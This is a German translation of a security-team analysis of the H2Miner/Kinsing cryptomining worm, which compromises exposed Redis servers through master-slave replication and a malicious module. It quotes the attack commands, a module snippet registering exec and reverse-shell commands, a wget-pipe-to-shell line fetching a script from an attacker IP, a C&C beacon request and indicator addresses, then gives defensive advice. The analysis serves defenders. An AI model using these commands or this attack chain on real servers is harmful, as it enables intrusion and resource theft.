Vor einem Tag wurde einer der Server meines Projekts von einem ähnlichen Wurm angegriffen. Auf der Suche nach einer Antwort auf die Frage „Was war das?“ Ich habe einen tollen Artikel des Alibaba Cloud Security-Teams gefunden. Da ich diesen Artikel nicht auf Habré gefunden habe, habe ich beschlossen, ihn speziell für Sie zu übersetzen <3
Eintrag
Kürzlich entdeckte das Sicherheitsteam von Alibaba Cloud einen plötzlichen Ausbruch von H2Miner. Diese Art von bösartigem Wurm nutzt die fehlende Autorisierung oder schwache Passwörter für Redis als Gateways zu Ihren Systemen, synchronisiert anschließend sein eigenes bösartiges Modul mit dem Slave durch Master-Slave-Synchronisierung und lädt dieses bösartige Modul schließlich auf den angegriffenen Computer herunter und führt bösartige Aktionen aus Anweisungen.
In der Vergangenheit wurden Angriffe auf Ihre Systeme hauptsächlich mithilfe einer Methode durchgeführt, bei der geplante Aufgaben oder SSH-Schlüssel zum Einsatz kamen, die auf Ihren Computer geschrieben wurden, nachdem sich der Angreifer bei Redis angemeldet hatte. Glücklicherweise kann diese Methode aufgrund von Problemen mit der Berechtigungskontrolle oder aufgrund unterschiedlicher Systemversionen nicht oft verwendet werden. Allerdings kann diese Methode zum Laden eines Schadmoduls die Befehle des Angreifers direkt ausführen oder sich Zugriff auf die Shell verschaffen, was für Ihr System gefährlich ist.
Aufgrund der großen Anzahl von Redis-Servern, die im Internet gehostet werden (fast 1 Million), empfiehlt das Sicherheitsteam von Alibaba Cloud den Benutzern als freundliche Erinnerung, Redis nicht online zu teilen und regelmäßig die Stärke ihrer Passwörter zu überprüfen und festzustellen, ob sie kompromittiert sind. schnelle Auswahl.
H2Miner
H2Miner ist ein Mining-Botnetz für Linux-basierte Systeme, das auf verschiedene Weise in Ihr System eindringen kann, einschließlich fehlender Autorisierung in Hadoop-Garn-, Docker- und Redis-Schwachstellen zur Remote-Befehlsausführung (RCE). Ein Botnet funktioniert, indem es bösartige Skripte und Malware herunterlädt, um Ihre Daten auszuwerten, den Angriff horizontal auszuweiten und die Command-and-Control-Kommunikation (C&C) aufrechtzuerhalten.
Redis RCE
Wissen zu diesem Thema teilte Pavel Toporkov auf der ZeroNights 2018 mit. Nach Version 4.0 unterstützt Redis eine Plug-in-Ladefunktion, die Benutzern die Möglichkeit gibt, mit C kompilierte Dateien in Redis zu laden, um bestimmte Redis-Befehle auszuführen. Diese Funktion ist zwar nützlich, enthält jedoch eine Schwachstelle, durch die im Master-Slave-Modus Dateien über den Fullresync-Modus mit dem Slave synchronisiert werden können. Dies kann von einem Angreifer genutzt werden, um bösartige Dateien zu übertragen. Nachdem die Übertragung abgeschlossen ist, laden die Angreifer das Modul auf die angegriffene Redis-Instanz und führen einen beliebigen Befehl aus.
Analyse von Malware-Würmern
Kürzlich entdeckte das Alibaba Cloud-Sicherheitsteam, dass die Größe der böswilligen Miner-Gruppe H2Miner plötzlich dramatisch zugenommen hat. Der Analyse zufolge sieht der allgemeine Ablauf eines Angriffs wie folgt aus:
H2Miner nutzt RCE Redis für einen vollwertigen Angriff. Angreifer greifen zunächst ungeschützte Redis-Server oder Server mit schwachen Passwörtern an.
Dann verwenden sie den Befehl config set dbfilename red2.so um den Dateinamen zu ändern. Anschließend führen die Angreifer den Befehl aus slaveof , um die Hostadresse für die Master-Slave-Replikation festzulegen.
Wenn die angegriffene Redis-Instanz eine Master-Slave-Verbindung mit dem bösartigen Redis herstellt, das dem Angreifer gehört, sendet der Angreifer das infizierte Modul mit dem Befehl fullresync, um die Dateien zu synchronisieren. Die Datei red2.so wird dann auf den angegriffenen Computer heruntergeladen. Anschließend nutzen die Angreifer das Lademodul ./red2.so, um diese so-Datei zu laden. Das Modul kann Befehle eines Angreifers ausführen oder eine Rückverbindung (Hintertür) initiieren, um Zugriff auf die angegriffene Maschine zu erhalten.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Nach der Ausführung eines böswilligen Befehls wie z / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, setzt der Angreifer den Namen der Sicherungsdatei zurück und entlädt das Systemmodul, um die Spuren zu bereinigen. Die Datei red2.so verbleibt jedoch weiterhin auf dem angegriffenen Computer. Benutzern wird empfohlen, auf das Vorhandensein einer solchen verdächtigen Datei im Ordner ihrer Redis-Instanz zu achten.
Der Angreifer beendete nicht nur einige bösartige Prozesse, um Ressourcen zu stehlen, sondern verfolgte auch ein bösartiges Skript, indem er bösartige Binärdateien herunterlud und ausführte . Das bedeutet, dass der Prozessname oder Verzeichnisname, der Kinsing auf dem Host enthält, möglicherweise darauf hinweist, dass dieser Computer mit diesem Virus infiziert wurde.
Den Reverse-Engineering-Ergebnissen zufolge führt die Malware hauptsächlich die folgenden Funktionen aus:
- Dateien hochladen und ausführen
- Bergbau
- Aufrechterhaltung der C&C-Kommunikation und Ausführung von Angreiferbefehlen
Nutzen Sie Masscan für externes Scannen, um Ihren Einfluss zu erweitern. Darüber hinaus ist die IP-Adresse des C&C-Servers im Programm fest codiert und der angegriffene Host kommuniziert mit dem C&C-Kommunikationsserver über HTTP-Anfragen, wobei die Zombie-Informationen (kompromittierter Server) im HTTP-Header identifiziert werden.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Andere Angriffsmethoden
Vom Wurm verwendete Adressen und Links
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
sc
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Rat
Erstens sollte Redis nicht über das Internet zugänglich sein und mit einem starken Passwort geschützt werden. Es ist außerdem wichtig, dass Clients überprüfen, ob sich im Redis-Verzeichnis keine Datei red2.so befindet und ob im Datei-/Prozessnamen auf dem Host kein „Kinsing“ vorliegt.
Source: habr.com